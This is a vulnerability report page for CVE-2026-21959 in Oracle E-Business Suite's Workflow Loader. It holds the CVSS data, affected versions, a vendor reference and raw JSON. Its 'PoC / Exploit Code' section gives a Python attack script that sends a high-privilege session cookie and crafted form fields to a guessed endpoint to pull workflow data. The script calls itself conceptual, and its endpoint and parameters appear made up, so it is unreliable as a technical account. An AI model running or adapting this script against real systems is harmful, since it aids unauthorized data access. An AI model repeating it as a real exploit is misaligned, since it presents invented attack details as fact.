Security Vulnerability Report
CVE-2026-21959 CVSS 4.9 MEDIUM

CVE-2026-21959

Published: 2026-01-20 22:15:59
Last Modified: 2026-01-29 20:59:34

Description

Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Loader). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Workflow accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:* - VULNERABLE
Oracle E-Business Suite 12.2.3
Oracle E-Business Suite 12.2.4
Oracle E-Business Suite 12.2.5
Oracle E-Business Suite 12.2.6
Oracle E-Business Suite 12.2.7
Oracle E-Business Suite 12.2.8
Oracle E-Business Suite 12.2.9
Oracle E-Business Suite 12.2.10
Oracle E-Business Suite 12.2.11
Oracle E-Business Suite 12.2.12
Oracle E-Business Suite 12.2.13
Oracle E-Business Suite 12.2.14
Oracle E-Business Suite 12.2.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21959 PoC - Oracle Workflow Loader Unauthorized Access
# Note: This is a conceptual PoC for authorized security testing only
import sys

import requests
import urllib3

# Suppress the InsecureRequestWarning raised by verify=False below
urllib3.disable_warnings()


def exploit_cve_2026_21959(target_url, session_cookie):
    """
    Oracle Workflow Loader component unauthorized access PoC

    Requirements:
    - Valid high-privilege Oracle E-Business Suite session cookie
    - Target URL for Oracle Workflow Loader endpoint
    """
    headers = {
        'Cookie': session_cookie,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    # Workflow Loader endpoint (specific path depends on EBS configuration)
    workflow_loader_url = f"{target_url}/OA_HTML/wf_loader.jsp"

    # Malicious request to trigger unauthorized data access
    payload = {
        'WFTYPE': 'LOADER',
        'ACTION': 'LOAD',
        'ITEM_TYPE': 'WFSTD',
        'LOAD_TYPE': 'ALL'
    }

    try:
        response = requests.post(
            workflow_loader_url,
            data=payload,
            headers=headers,
            verify=False,
            timeout=30
        )
        if response.status_code == 200:
            # Check for sensitive data in response
            if 'WF_ATTRIBUTES' in response.text or 'WORKFLOW' in response.text:
                print('[+] Potential unauthorized data access detected')
                return True
        else:
            print(f'[-] Request failed with status: {response.status_code}')
            return False
    except requests.exceptions.RequestException as e:
        print(f'[-] Connection error: {e}')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print('Usage: python cve-2026-21959.py <target_url> <session_cookie>')
        print('Example: python cve-2026-21959.py https://ebs.example.com "JSESSIONID=xxx"')
        sys.exit(1)
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_cve_2026_21959(target, cookie)

References

https://www.oracle.com/security-alerts/cpujan2026.html (Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21959", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:15:58.740", "lastModified": "2026-01-29T20:59:34.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Workflow Loader). Supported versions that are affected are 12.2.3-12.2.15. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Workflow. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Workflow accessible data. CVSS 3.1 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Workflow de Oracle E-Business Suite (componente: Workflow Loader). Las versiones compatibles que están afectadas son 12.2.3-12.2.15. Una vulnerabilidad fácilmente explotable permite a un atacante con altos privilegios con acceso a la red vía HTTP comprometer Oracle Workflow. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Workflow. Puntuación Base CVSS 3.1 de 4.9 (Impactos en la confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:workflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.15", "matchCriteriaId": "6A7096C1-7479-4111-A29B-5FF3AA0ECCD2"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}